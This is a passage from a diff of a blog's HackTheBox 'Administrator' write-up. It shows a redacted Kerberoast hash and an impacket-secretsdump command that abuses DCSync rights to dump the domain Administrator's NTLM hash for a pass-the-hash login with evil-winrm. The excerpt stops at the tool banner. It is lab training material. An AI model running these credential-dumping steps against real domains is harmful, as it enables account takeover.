tiagomanunes/tiagomanunes.github.io/_writeups/administrator.md

 $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$3<SNIP>c$a<REDACTED>b:<REDACTED>
 ```

-I had seen at the start that Ethan (_Hunt!!!_) had `DCSync` rights, but I wondered if that was the work of another player and if I was about to cheese the box.
+I had seen at the start that Ethan had `DCSync` rights, but I wondered if that was the work of another player and if I was about to cheese the box.
 I asked for a reset before running the following, and it still ran, so... it's up there with the easiest root flags ever.
 We use the Impacket toolkit to dump the Administrator's NTLM hash, and pass that hash to log in with `evil-winrm`:
 ```
 $ impacket-secretsdump 'administrator.htb'/'Ethan':'<REDACTED>'@'DC.ADMINISTRATOR.HTB' -just-dc-user 'Administrator'
 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies